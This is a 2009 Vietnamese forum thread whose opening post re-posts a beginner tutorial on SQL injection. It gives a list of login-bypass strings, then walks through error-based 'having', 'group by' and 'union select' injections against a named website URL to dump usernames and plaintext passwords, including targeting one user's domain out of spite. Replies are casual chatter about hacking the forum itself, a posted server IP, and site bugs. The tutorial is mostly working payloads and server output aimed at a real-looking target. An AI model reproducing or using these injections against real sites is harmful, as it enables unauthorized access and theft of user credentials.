Cách hack 1 trang web cơ bản

Tiêu đề: Cách hack 1 trang web cơ bản Thu Jul 30, 2009 8:32 pm

Hôm qua lang thand trên mạng tự nhiên thấy cái này, mình thử làm theo cách của nó đến đoạn cuối thì chịu, ko làm nối.... ai thử làm cái này đê Laughing

:
-------------------------
Quá trình hack 1 website bị Sql Injection :

Trong bài viết này, mình sẽ có kèm theo quá trình inject một website và lý thuyết cơ bản về SQL injection để các bạn có thể hiểu rõ hơn. Nhưng có lẽ là chỉ cho newbie thôi, khi nào rỗi tôi sẽ viết và hướng dẫn advance sql injection, tất nhiên có kèm theo một site để các bạn thực hành.

Chúng ta hãy bắt đầu :
Sql injection đang dần phổ biến hiện nay, và có lẽ lỗi nhiều nhất vẫn là ở các site MS SQl. Nó rất nguy hiểm, nó cho phép chúng ta login mà không cần username và password, remote execution, dump data và truy xuất username + password ra ngoài bằng cách input các query/command vào input trước khi chuyển cho ứng dụng web xử lí. Để thử xem site đó có bị lỗi hay không, bạn thử input vào các field username và pass bằng :
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'or''='

và còn rất nhiều nữa mình không tiện viết ở đây. Rất có thể bạn sẽ login được vào với quyền admin hoặc một user nào đó. Nhưng ở bài viết này tôi nói đến cách truy xuất username và password ra ngoài để chúng ta mặc nhiên vào trong CP.

Ở đây, tôi sẽ lấy ra một site bất kỳ, nhưng khi bạn muốn tấn công một trang nào đó thì lại khác, bạn phải bỏ công ra tìm link nhiễm.

Mục tiêu tấn công : http://www.naame.com/manageAccount/manaccount516.asp

Bây giờ để xác định xem có bị SQL injection không, bạn thử input các lệnh tôi liệt kê ở trên, không by pass login được bạn input thử dấu ngoặc đơn '

kết quả :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '''.
/manageAccount/acctIncludes/manaccount_inc.asp, line 33

thế là biết mục tiêu bị lỗi rồi nhé, bây giờ việc cần làm là lấy được ra các table name của nó, dùng : 'having 1=1-- .Bạn hãy để ý thấy dâu --, vâng trong MS SQL, tất cả các thứ sau -- sẽ bị loại bỏ.

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'LoginTable.Account' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Ok rồi : Column 'LoginTable.Account' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

Vậy là ta lấy được 1 table rồi đó. Bước tiếp theo :

'GROUP BY LoginTable.Account having 1=1--

Nó báo :

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'LoginTable.UserName' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Lại lấy được thêm một cột nữa rồi. Bạn thay vào : (thêm 1 cột và ngăn cách bằng dấu phẩy)

'GROUP BY LoginTable.Account, LoginTable.UserName having 1=1--

Bạn cứ làm thế để lấy các table của nó. Tôi đã lấy sẵn ra cho các bạn :

'group by LoginTable.Account, LoginTable.UserName, LoginTable.Password, LoginTable.DomainName, LoginTable.Credits, LoginTable.LoginType having 1=1--

Lấy được các table rồi thì làm gì Các các bạn nhìn vào cột "username" và "password" là thèm lắm rồi, muốn lấy ra ngay, híc, nhưng phải từ từ đã, đi đâu mà vội. Có được nó rồi, ta thử tìm một link bị lỗi (tìm nó trên thành address bằng cách thêm ' vào sau = hoặc =cái gì đó'). Nhưng mà ở trang này nó không có một link nào dính lỗi, thì ta lại dựa vào cái forum input vậy.

Ta thử nhé : (input vào field username và password rồi submit thử).

'union select min(UserName),1,1,1,1,1 from LoginTable where UserName > 'h'--

hì, chắc các bạn sẽ hỏi mấy cái thằng 1,1,1,1,1 là gì sao lại đặt ở đó, nói nôm na và dễ hiểu cho newbie luôn là các bạn đếm xem có bao nhiêu cột ngoại trừ cột Username và thay cho mỗi cột đó là 1 . thế thôi. Còn thằng UserName > 'h' à, nó sẽ "xuất" ra một username bất kỳ bắt đầu bằng letter 'h' .

Nó báo :

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'h20h20' to a column of data type int.

/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Cười tươi xem nào, có 1 thằng username làm cảnh rồi nhé. Muốn biết password của náo thì làm như sau :

'union select Password,1,1,1,1,1 from LoginTable where UserName = 'h20h20'--

ta thay sau UserName là dấu = 'username vừa lấy được'--

Nó báo :

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'legogame' to a column of data type int.

/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Hì, password là legogame kìa, bạn login đi, còn chờ gì nữa.

* Note :

Nếu bạn muốn lấy thêm nhiều username khác thì :
'union select min(UserName),1,1,1,1,1 from LoginTable where UserName > 'h20h20'--
nó sẽ lấy ra một username khác. Nếu bạn muốn username bắt đầu bằng B chẳng hạn, thì thay bằng 'b'-- thế thôi.
trong trường hợp bạn muốn tấn login vào một domain nào đó đinh trước thì thay cột DomainName vào cột UserName. Ví dụ , tôi ghét thằng maika, nó có cái domain là H0MES4RENT.com mua ở đó thì tôi muốn biết password của nó ta dùng :
'union select password,1,1,1,1,1 from LoginTable where DomainName = 'H0MES4RENT.com'--

Nó báo :
Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'joepinguelo' to a column of data type int.

/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Hì password là joepinguelo rồi nhé, lại lấy username của nó đi :

'union select UserName,1,1,1,1,1 from LoginTable where DomainName = 'H0MES4RENT.com'--

Kết quả :

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'joepinguelo' to a column of data type int.

/manageAccount/acctIncludes/manaccount_inc.asp, line 33

Và Username là joepinguelo

Login thử xem, Username : joepinguelo
Password : joepinguelo
-------------------------
Nếu ko phải dân có tí kiến thức về CNTT thì ai nhìn vào chắc xĩu ko Laughing

Tiêu đề: Re: Cách hack 1 trang web cơ bản Thu Jul 30, 2009 10:19 pm

IP máy chủ 4F là: 217.179.57.22 à anh Q Very Happy

Tiêu đề: Re: Cách hack 1 trang web cơ bản Fri Jul 31, 2009 10:41 am

@Atula: ^^~......hack được thỳ hack đi em cho tất cả khỏi vào 4rum lun đang thik

Tiêu đề: Re: Cách hack 1 trang web cơ bản Fri Jul 31, 2009 11:44 am

, tiếc là em ko có phần mềm viết trojan keyloger cười bò

, mà em cũng chẳng bít hack đâu mà làm

Tiêu đề: Re: Cách hack 1 trang web cơ bản Fri Jul 31, 2009 1:27 pm

@Atula: bj0 thời đại công nghệ em ạ.......ra hack cũng ra lun cả chống hack chúng nó chống đi chống lại nhau ý mà...........nếu bị hack thật......thỳ chắc ank phải cài chống hack

Tiêu đề: Re: Cách hack 1 trang web cơ bản Fri Jul 31, 2009 5:27 pm

E hok hiểu sao lại có người phát minh ra virus với hack làm gì. Cứ nhìn mấy con trojan chạy lung tung trong máy nhà mình mà chỉ muốn đập cái màn hình đi khóc

Tiêu đề: Re: Cách hack 1 trang web cơ bản Fri Jul 31, 2009 6:27 pm

@Quang: hình như web mình bị lỗi, em có nhờ 1 anh quét hộ 4F mình có bị lỗi ko.. anh~ pm em bảo có lỗ hổng phần đăng ký.... anh xem lại chỗ đó có sao ko nhé Shocked

Tiêu đề: Re: Cách hack 1 trang web cơ bản Fri Jul 31, 2009 9:31 pm

Hết ngày # run

Tiêu đề: Re: Cách hack 1 trang web cơ bản Fri Jul 31, 2009 10:28 pm

@Atula: .........thật à.........sao ank ý quét ra có 1 lỗi nhỉ tự ank đếm sơ sơ cũng chục lỗi rồi

Tiêu đề: Re: Cách hack 1 trang web cơ bản Sat Aug 01, 2009 7:26 am

Đó là lỗ hổng thôi, con 4F mình nhìn vào chắc cũng như anh nói cười bò

Tiêu đề: Re: Cách hack 1 trang web cơ bản Sat Aug 01, 2009 8:18 am

@atula: thế em thử kể đi xem được những lỗi nào

Tiêu đề: Re: Cách hack 1 trang web cơ bản Sat Aug 01, 2009 8:31 am

Em kể 2 lỗi nhá Laughing

, những lỗi khác anh bảo anh đếm dc nên kể làm chi Wink

1. Cứ viết dc vài bài, đi sang bài khác muốn reply phải đăng nhập lại.....test thử ở nhiều máy + nhiều quán tình trạng vẫn còn Sad

2. Nhiều khi không vào dc 4F......màn hình báo lỗi......đã gặp ở nhiều máy khóc

.
.........
Em góp ý: nên bổ sung nhiều topic icon vào, có mỗi cái mặt khóc ít quá chịu

Tiêu đề: Re: Cách hack 1 trang web cơ bản Sat Aug 01, 2009 11:25 am

@Atula: cả 2 lỗi em nói đều do lỗi của trang web chủ..và ngoài ra cách trị là xoá hết cookie của máy đi đảm bảo không sao...còn vc lỗi web là do mạng quán lởm hoặc dùng IE hok tương thích cho lắm....sài Ff là vừa
Còn topic icon anh sẽ up tiếp ^^~

Tiêu đề: Re: Cách hack 1 trang web cơ bản Sat Aug 01, 2009 3:25 pm

UHm....chắc là do cái IE ko phù hợp thôi.....anh có cần các topic icon mới ko Smile

Tiêu đề: Re: Cách hack 1 trang web cơ bản Sat Aug 01, 2009 5:23 pm

@Atula: đã update

» Trang sức babie
» cách làm bài tốt môn địa.
» Cách tạo homepate
» Cách post hình ảnh lên 4rum
» Hướng dẫn cách chèn mp3 và wma vào diễn đàn